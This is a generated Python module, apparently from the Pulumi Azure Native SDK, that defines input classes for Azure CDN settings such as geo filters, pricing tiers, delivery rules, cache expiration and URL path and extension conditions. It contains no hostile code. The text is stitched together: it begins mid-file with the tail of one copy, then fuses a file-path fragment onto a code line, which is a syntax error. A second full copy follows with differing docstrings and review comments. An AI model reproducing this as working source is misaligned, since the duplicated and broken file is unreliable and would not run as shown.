    def action(self) -> pulumi.Input['GeoFilterActions']:
        """
        Action of the geo filter, i.e. allow or block access.
        """
        return pulumi.get(self, "action")

    @action.setter
    def action(self, value: pulumi.Input['GeoFilterActions']):
        pulumi.set(self, "action", value)

    @property
    @pulumi.getter(name="countryCodes")
    def country_codes(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
        """
        Two letter country codes defining user country access in a geo filter, e.g. AU, MX, US.
        """
        return pulumi.get(self, "country_codes")

    @country_codes.setter
    def country_codes(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
        pulumi.set(self, "country_codes", value)

    @property
    @pulumi.getter(name="relativePath")
    def relative_path(self) -> pulumi.Input[str]:
        """
        Relative path applicable to geo filter. (e.g. '/mypictures', '/mypicture/kitty.jpg', and etc.)
        """
        return pulumi.get(self, "relative_path")

    @relative_path.setter
    def relative_path(self, value: pulumi.Input[str]):
        pulumi.set(self, "relative_path", value)
@pulumi.input_type
class SkuArgs:
    def __init__(__self__, *,
                 name: Optional[pulumi.Input[Union[str, 'SkuName']]] = None):
        """
        The pricing tier (defines a CDN provider, feature list and rate) of the CDN profile.
        :param pulumi.Input[Union[str, 'SkuName']] name: Name of the pricing tier.
        """
        # Optional field: only stored when provided.
        if name is not None:
            pulumi.set(__self__, "name", name)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[Union[str, 'SkuName']]]:
        """
        Name of the pricing tier.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[Union[str, 'SkuName']]]):
        pulumi.set(self, "name", value)
@pulumi.input_type
class UrlFileExtensionConditionParametersArgs:
    def __init__(__self__, *,
                 extensions: pulumi.Input[Sequence[pulumi.Input[str]]],
                 odata_type: pulumi.Input[str]):
        """
        Defines the parameters for the URL file extension condition.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] extensions: A list of extensions for the condition of the delivery rule.
        :param pulumi.Input[str] odata_type: OData type string; undocumented in the upstream API spec.
        """
        pulumi.set(__self__, "extensions", extensions)
        pulumi.set(__self__, "odata_type", odata_type)

    @property
    @pulumi.getter
    def extensions(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
        """
        A list of extensions for the condition of the delivery rule.
        """
        return pulumi.get(self, "extensions")

    @extensions.setter
    def extensions(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
        pulumi.set(self, "extensions", value)

    @property
    @pulumi.getter(name="odataType")
    def odata_type(self) -> pulumi.Input[str]:
        """
        OData type string; undocumented in the upstream API spec.
        """
        return pulumi.get(self, "odata_type")

    @odata_type.setter
    def odata_type(self, value: pulumi.Input[str]):
        pulumi.set(self, "odata_type", value)
@pulumi.input_type
class UrlPathConditionParametersArgs:
    def __init__(__self__, *,
                 match_type: pulumi.Input[str],
                 odata_type: pulumi.Input[str],
                 path: pulumi.Input[str]):
        """
        Defines the parameters for the URL path condition.
        :param pulumi.Input[str] match_type: The match type for the condition of the delivery rule
        :param pulumi.Input[str] odata_type: OData type string; undocumented in the upstream API spec.
        :param pulumi.Input[str] path: A URL path for the condition of the delivery rule
        """
        pulumi.set(__self__, "match_type", match_type)
        pulumi.set(__self__, "odata_type", odata_type)
        pulumi.set(__self__, "path", path)

    @property
    @pulumi.getter(name="matchType")
    def match_type(self) -> pulumi.Input[str]:
        """
        The match type for the condition of the delivery rule
        """
        return pulumi.get(self, "match_type")

    @match_type.setter
    def match_type(self, value: pulumi.Input[str]):
        pulumi.set(self, "match_type", value)

    @property
    @pulumi.getter(name="odataType")
    def odata_type(self) -> pulumi.Input[str]:
        """
        OData type string; undocumented in the upstream API spec.
        """
        return pulumi.get(self, "odata_type")

    @odata_type.setter
    def odata_type(self, value: pulumi.Input[str]):
        pulumi.set(self, "odata_type", value)

    @property
    @pulumi.getter
    def path(self) -> pulumi.Input[str]:
        """
        A URL path for the condition of the delivery rule
        """
        return pulumi.get(self, "path")

    @path.setter
    def path(self, value: pulumi.Input[str]):
        # NOTE(review): the "| sdk/... |" text fused onto the line below is
        # dataset-extraction residue, not code.
        pulumi.set(self, "path", value) | sdk/python/pulumi_azure_native/cdn/v20171012/_inputs.py |
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from ._enums import *
# Names exported when this generated module is star-imported.
__all__ = [
    'CacheExpirationActionParametersArgs',
    'DeepCreatedOriginArgs',
    'DeliveryRuleCacheExpirationActionArgs',
    'DeliveryRuleUrlFileExtensionConditionArgs',
    'DeliveryRuleUrlPathConditionArgs',
    'DeliveryRuleArgs',
    'EndpointPropertiesUpdateParametersDeliveryPolicyArgs',
    'GeoFilterArgs',
    'SkuArgs',
    'UrlFileExtensionConditionParametersArgs',
    'UrlPathConditionParametersArgs',
]
@pulumi.input_type
class CacheExpirationActionParametersArgs:
    # Generated input type: structure is introspected by @pulumi.input_type,
    # so fields are stored/read via pulumi.set/pulumi.get.
    def __init__(__self__, *,
                 cache_behavior: pulumi.Input[str],
                 cache_type: pulumi.Input[str],
                 odata_type: pulumi.Input[str],
                 cache_duration: Optional[pulumi.Input[str]] = None):
        """
        Defines the parameters for the cache expiration action.
        :param pulumi.Input[str] cache_behavior: Caching behavior for the requests that include query strings.
        :param pulumi.Input[str] cache_type: The level at which the content needs to be cached.
        :param pulumi.Input[str] odata_type: OData type string; undocumented in the upstream API spec.
        :param pulumi.Input[str] cache_duration: The duration for which the content needs to be cached. Allowed format is [d.]hh:mm:ss
        """
        pulumi.set(__self__, "cache_behavior", cache_behavior)
        pulumi.set(__self__, "cache_type", cache_type)
        pulumi.set(__self__, "odata_type", odata_type)
        # Optional field: only stored when provided.
        if cache_duration is not None:
            pulumi.set(__self__, "cache_duration", cache_duration)

    @property
    @pulumi.getter(name="cacheBehavior")
    def cache_behavior(self) -> pulumi.Input[str]:
        """
        Caching behavior for the requests that include query strings.
        """
        return pulumi.get(self, "cache_behavior")

    @cache_behavior.setter
    def cache_behavior(self, value: pulumi.Input[str]):
        pulumi.set(self, "cache_behavior", value)

    @property
    @pulumi.getter(name="cacheType")
    def cache_type(self) -> pulumi.Input[str]:
        """
        The level at which the content needs to be cached.
        """
        return pulumi.get(self, "cache_type")

    @cache_type.setter
    def cache_type(self, value: pulumi.Input[str]):
        pulumi.set(self, "cache_type", value)

    @property
    @pulumi.getter(name="odataType")
    def odata_type(self) -> pulumi.Input[str]:
        """
        OData type string; undocumented in the upstream API spec.
        """
        return pulumi.get(self, "odata_type")

    @odata_type.setter
    def odata_type(self, value: pulumi.Input[str]):
        pulumi.set(self, "odata_type", value)

    @property
    @pulumi.getter(name="cacheDuration")
    def cache_duration(self) -> Optional[pulumi.Input[str]]:
        """
        The duration for which the content needs to be cached. Allowed format is [d.]hh:mm:ss
        """
        return pulumi.get(self, "cache_duration")

    @cache_duration.setter
    def cache_duration(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "cache_duration", value)
@pulumi.input_type
class DeepCreatedOriginArgs:
    def __init__(__self__, *,
                 host_name: pulumi.Input[str],
                 name: pulumi.Input[str],
                 http_port: Optional[pulumi.Input[int]] = None,
                 https_port: Optional[pulumi.Input[int]] = None):
        """
        The main origin of CDN content which is added when creating a CDN endpoint.
        :param pulumi.Input[str] host_name: The address of the origin. It can be a domain name, IPv4 address, or IPv6 address.
        :param pulumi.Input[str] name: Origin name
        :param pulumi.Input[int] http_port: The value of the HTTP port. Must be between 1 and 65535
        :param pulumi.Input[int] https_port: The value of the HTTPS port. Must be between 1 and 65535
        """
        pulumi.set(__self__, "host_name", host_name)
        pulumi.set(__self__, "name", name)
        # Optional ports: only stored when provided.
        if http_port is not None:
            pulumi.set(__self__, "http_port", http_port)
        if https_port is not None:
            pulumi.set(__self__, "https_port", https_port)

    @property
    @pulumi.getter(name="hostName")
    def host_name(self) -> pulumi.Input[str]:
        """
        The address of the origin. It can be a domain name, IPv4 address, or IPv6 address.
        """
        return pulumi.get(self, "host_name")

    @host_name.setter
    def host_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "host_name", value)

    @property
    @pulumi.getter
    def name(self) -> pulumi.Input[str]:
        """
        Origin name
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: pulumi.Input[str]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter(name="httpPort")
    def http_port(self) -> Optional[pulumi.Input[int]]:
        """
        The value of the HTTP port. Must be between 1 and 65535
        """
        return pulumi.get(self, "http_port")

    @http_port.setter
    def http_port(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "http_port", value)

    @property
    @pulumi.getter(name="httpsPort")
    def https_port(self) -> Optional[pulumi.Input[int]]:
        """
        The value of the HTTPS port. Must be between 1 and 65535
        """
        return pulumi.get(self, "https_port")

    @https_port.setter
    def https_port(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "https_port", value)
@pulumi.input_type
class DeliveryRuleCacheExpirationActionArgs:
    def __init__(__self__, *,
                 name: pulumi.Input[str],
                 parameters: pulumi.Input['CacheExpirationActionParametersArgs']):
        """
        Defines the cache expiration action for the delivery rule.
        :param pulumi.Input[str] name: The name of the action for the delivery rule.
               Expected value is 'CacheExpiration'.
        :param pulumi.Input['CacheExpirationActionParametersArgs'] parameters: Defines the parameters for the action.
        """
        # The passed-in `name` is deliberately ignored: this type always
        # stores the fixed discriminator value 'CacheExpiration'.
        pulumi.set(__self__, "name", 'CacheExpiration')
        pulumi.set(__self__, "parameters", parameters)

    @property
    @pulumi.getter
    def name(self) -> pulumi.Input[str]:
        """
        The name of the action for the delivery rule.
        Expected value is 'CacheExpiration'.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: pulumi.Input[str]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter
    def parameters(self) -> pulumi.Input['CacheExpirationActionParametersArgs']:
        """
        Defines the parameters for the action.
        """
        return pulumi.get(self, "parameters")

    @parameters.setter
    def parameters(self, value: pulumi.Input['CacheExpirationActionParametersArgs']):
        pulumi.set(self, "parameters", value)
@pulumi.input_type
class DeliveryRuleUrlFileExtensionConditionArgs:
    def __init__(__self__, *,
                 name: pulumi.Input[str],
                 parameters: pulumi.Input['UrlFileExtensionConditionParametersArgs']):
        """
        Defines the URL file extension condition for the delivery rule.
        :param pulumi.Input[str] name: The name of the condition for the delivery rule.
               Expected value is 'UrlFileExtension'.
        :param pulumi.Input['UrlFileExtensionConditionParametersArgs'] parameters: Defines the parameters for the condition.
        """
        # The passed-in `name` is deliberately ignored: this type always
        # stores the fixed discriminator value 'UrlFileExtension'.
        pulumi.set(__self__, "name", 'UrlFileExtension')
        pulumi.set(__self__, "parameters", parameters)

    @property
    @pulumi.getter
    def name(self) -> pulumi.Input[str]:
        """
        The name of the condition for the delivery rule.
        Expected value is 'UrlFileExtension'.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: pulumi.Input[str]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter
    def parameters(self) -> pulumi.Input['UrlFileExtensionConditionParametersArgs']:
        """
        Defines the parameters for the condition.
        """
        return pulumi.get(self, "parameters")

    @parameters.setter
    def parameters(self, value: pulumi.Input['UrlFileExtensionConditionParametersArgs']):
        pulumi.set(self, "parameters", value)
@pulumi.input_type
class DeliveryRuleUrlPathConditionArgs:
    def __init__(__self__, *,
                 name: pulumi.Input[str],
                 parameters: pulumi.Input['UrlPathConditionParametersArgs']):
        """
        Defines the URL path condition for the delivery rule.
        :param pulumi.Input[str] name: The name of the condition for the delivery rule.
               Expected value is 'UrlPath'.
        :param pulumi.Input['UrlPathConditionParametersArgs'] parameters: Defines the parameters for the condition.
        """
        # The passed-in `name` is deliberately ignored: this type always
        # stores the fixed discriminator value 'UrlPath'.
        pulumi.set(__self__, "name", 'UrlPath')
        pulumi.set(__self__, "parameters", parameters)

    @property
    @pulumi.getter
    def name(self) -> pulumi.Input[str]:
        """
        The name of the condition for the delivery rule.
        Expected value is 'UrlPath'.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: pulumi.Input[str]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter
    def parameters(self) -> pulumi.Input['UrlPathConditionParametersArgs']:
        """
        Defines the parameters for the condition.
        """
        return pulumi.get(self, "parameters")

    @parameters.setter
    def parameters(self, value: pulumi.Input['UrlPathConditionParametersArgs']):
        pulumi.set(self, "parameters", value)
@pulumi.input_type
class DeliveryRuleArgs:
    def __init__(__self__, *,
                 actions: pulumi.Input[Sequence[pulumi.Input['DeliveryRuleCacheExpirationActionArgs']]],
                 order: pulumi.Input[int],
                 conditions: Optional[pulumi.Input[Sequence[pulumi.Input[Union['DeliveryRuleUrlFileExtensionConditionArgs', 'DeliveryRuleUrlPathConditionArgs']]]]] = None):
        """
        A rule that specifies a set of actions and conditions
        :param pulumi.Input[Sequence[pulumi.Input['DeliveryRuleCacheExpirationActionArgs']]] actions: A list of actions that are executed when all the conditions of a rule are satisfied.
        :param pulumi.Input[int] order: The order in which the rules are applied for the endpoint. Possible values {0,1,2,3,………}. A rule with a lesser order will be applied before a rule with a greater order. Rule with order 0 is a special rule. It does not require any condition and actions listed in it will always be applied.
        :param pulumi.Input[Sequence[pulumi.Input[Union['DeliveryRuleUrlFileExtensionConditionArgs', 'DeliveryRuleUrlPathConditionArgs']]]] conditions: A list of conditions that must be matched for the actions to be executed
        """
        pulumi.set(__self__, "actions", actions)
        pulumi.set(__self__, "order", order)
        # Optional field: only stored when provided.
        if conditions is not None:
            pulumi.set(__self__, "conditions", conditions)

    @property
    @pulumi.getter
    def actions(self) -> pulumi.Input[Sequence[pulumi.Input['DeliveryRuleCacheExpirationActionArgs']]]:
        """
        A list of actions that are executed when all the conditions of a rule are satisfied.
        """
        return pulumi.get(self, "actions")

    @actions.setter
    def actions(self, value: pulumi.Input[Sequence[pulumi.Input['DeliveryRuleCacheExpirationActionArgs']]]):
        pulumi.set(self, "actions", value)

    @property
    @pulumi.getter
    def order(self) -> pulumi.Input[int]:
        """
        The order in which the rules are applied for the endpoint. Possible values {0,1,2,3,………}. A rule with a lesser order will be applied before a rule with a greater order. Rule with order 0 is a special rule. It does not require any condition and actions listed in it will always be applied.
        """
        return pulumi.get(self, "order")

    @order.setter
    def order(self, value: pulumi.Input[int]):
        pulumi.set(self, "order", value)

    @property
    @pulumi.getter
    def conditions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[Union['DeliveryRuleUrlFileExtensionConditionArgs', 'DeliveryRuleUrlPathConditionArgs']]]]]:
        """
        A list of conditions that must be matched for the actions to be executed
        """
        return pulumi.get(self, "conditions")

    @conditions.setter
    def conditions(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[Union['DeliveryRuleUrlFileExtensionConditionArgs', 'DeliveryRuleUrlPathConditionArgs']]]]]):
        pulumi.set(self, "conditions", value)
@pulumi.input_type
class EndpointPropertiesUpdateParametersDeliveryPolicyArgs:
    def __init__(__self__, *,
                 rules: pulumi.Input[Sequence[pulumi.Input['DeliveryRuleArgs']]],
                 description: Optional[pulumi.Input[str]] = None):
        """
        A policy that specifies the delivery rules to be used for an endpoint.

        :param pulumi.Input[Sequence[pulumi.Input['DeliveryRuleArgs']]] rules: A list of the delivery rules.
        :param pulumi.Input[str] description: User-friendly description of the policy.
        """
        # Required field is always written; the optional one only when supplied,
        # so an unset description stays absent from the property bag.
        pulumi.set(__self__, "rules", rules)
        if description is not None:
            pulumi.set(__self__, "description", description)

    @property
    @pulumi.getter
    def rules(self) -> pulumi.Input[Sequence[pulumi.Input['DeliveryRuleArgs']]]:
        """A list of the delivery rules."""
        return pulumi.get(self, "rules")

    @rules.setter
    def rules(self, value: pulumi.Input[Sequence[pulumi.Input['DeliveryRuleArgs']]]):
        pulumi.set(self, "rules", value)

    @property
    @pulumi.getter
    def description(self) -> Optional[pulumi.Input[str]]:
        """User-friendly description of the policy."""
        return pulumi.get(self, "description")

    @description.setter
    def description(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "description", value)
@pulumi.input_type
class GeoFilterArgs:
    def __init__(__self__, *,
                 action: pulumi.Input['GeoFilterActions'],
                 country_codes: pulumi.Input[Sequence[pulumi.Input[str]]],
                 relative_path: pulumi.Input[str]):
        """
        Rules defining user's geo access within a CDN endpoint.

        :param pulumi.Input['GeoFilterActions'] action: Action of the geo filter, i.e. allow or block access.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] country_codes: Two letter country codes defining user country access in a geo filter, e.g. AU, MX, US.
        :param pulumi.Input[str] relative_path: Relative path applicable to geo filter. (e.g. '/mypictures', '/mypicture/kitty.jpg', and etc.)
        """
        # All three fields are required; write each into the pulumi property bag.
        pulumi.set(__self__, "action", action)
        pulumi.set(__self__, "country_codes", country_codes)
        pulumi.set(__self__, "relative_path", relative_path)

    @property
    @pulumi.getter
    def action(self) -> pulumi.Input['GeoFilterActions']:
        """Action of the geo filter, i.e. allow or block access."""
        return pulumi.get(self, "action")

    @action.setter
    def action(self, value: pulumi.Input['GeoFilterActions']):
        pulumi.set(self, "action", value)

    @property
    @pulumi.getter(name="countryCodes")
    def country_codes(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
        """Two letter country codes defining user country access in a geo filter, e.g. AU, MX, US."""
        return pulumi.get(self, "country_codes")

    @country_codes.setter
    def country_codes(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
        pulumi.set(self, "country_codes", value)

    @property
    @pulumi.getter(name="relativePath")
    def relative_path(self) -> pulumi.Input[str]:
        """Relative path applicable to geo filter. (e.g. '/mypictures', '/mypicture/kitty.jpg', and etc.)"""
        return pulumi.get(self, "relative_path")

    @relative_path.setter
    def relative_path(self, value: pulumi.Input[str]):
        pulumi.set(self, "relative_path", value)
@pulumi.input_type
class SkuArgs:
    def __init__(__self__, *,
                 name: Optional[pulumi.Input[Union[str, 'SkuName']]] = None):
        """
        The pricing tier (defines a CDN provider, feature list and rate) of the CDN profile.

        :param pulumi.Input[Union[str, 'SkuName']] name: Name of the pricing tier.
        """
        # Only record the field when the caller actually supplied one, so an
        # unset name stays absent from the pulumi property bag.
        if name is not None:
            pulumi.set(__self__, "name", name)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[Union[str, 'SkuName']]]:
        """Name of the pricing tier."""
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[Union[str, 'SkuName']]]):
        pulumi.set(self, "name", value)
@pulumi.input_type
class UrlFileExtensionConditionParametersArgs:
    def __init__(__self__, *,
                 extensions: pulumi.Input[Sequence[pulumi.Input[str]]],
                 odata_type: pulumi.Input[str]):
        """
        Defines the parameters for the URL file extension condition.

        :param pulumi.Input[Sequence[pulumi.Input[str]]] extensions: A list of extensions for the condition of the delivery rule.
        :param pulumi.Input[str] odata_type: presumably the OData type discriminator string for this parameter set — not documented in the generated source; verify against the Azure CDN REST API reference.
        """
        # Both fields are required; write each into the pulumi property bag.
        pulumi.set(__self__, "extensions", extensions)
        pulumi.set(__self__, "odata_type", odata_type)

    @property
    @pulumi.getter
    def extensions(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
        """A list of extensions for the condition of the delivery rule."""
        return pulumi.get(self, "extensions")

    @extensions.setter
    def extensions(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
        pulumi.set(self, "extensions", value)

    @property
    @pulumi.getter(name="odataType")
    def odata_type(self) -> pulumi.Input[str]:
        # NOTE(review): undocumented in the generated source; serialized as
        # "odataType" on the wire per the getter name.
        return pulumi.get(self, "odata_type")

    @odata_type.setter
    def odata_type(self, value: pulumi.Input[str]):
        pulumi.set(self, "odata_type", value)
@pulumi.input_type
class UrlPathConditionParametersArgs:
    def __init__(__self__, *,
                 match_type: pulumi.Input[str],
                 odata_type: pulumi.Input[str],
                 path: pulumi.Input[str]):
        """
        Defines the parameters for the URL path condition.

        :param pulumi.Input[str] match_type: The match type for the condition of the delivery rule
        :param pulumi.Input[str] odata_type: presumably the OData type discriminator string for this parameter set — not documented in the generated source; verify against the Azure CDN REST API reference.
        :param pulumi.Input[str] path: A URL path for the condition of the delivery rule
        """
        # All three fields are required; write each into the pulumi property bag.
        pulumi.set(__self__, "match_type", match_type)
        pulumi.set(__self__, "odata_type", odata_type)
        pulumi.set(__self__, "path", path)

    @property
    @pulumi.getter(name="matchType")
    def match_type(self) -> pulumi.Input[str]:
        """The match type for the condition of the delivery rule"""
        return pulumi.get(self, "match_type")

    @match_type.setter
    def match_type(self, value: pulumi.Input[str]):
        pulumi.set(self, "match_type", value)

    @property
    @pulumi.getter(name="odataType")
    def odata_type(self) -> pulumi.Input[str]:
        # NOTE(review): undocumented in the generated source; serialized as
        # "odataType" on the wire per the getter name.
        return pulumi.get(self, "odata_type")

    @odata_type.setter
    def odata_type(self, value: pulumi.Input[str]):
        pulumi.set(self, "odata_type", value)

    @property
    @pulumi.getter
    def path(self) -> pulumi.Input[str]:
        """A URL path for the condition of the delivery rule"""
        return pulumi.get(self, "path")

    @path.setter
    def path(self, value: pulumi.Input[str]):
        # Fix: the original final line carried extraction residue
        # ("| 0.868213 | 0.07703") appended after this statement, which is a
        # syntax error; the statement itself is unchanged.
        pulumi.set(self, "path", value)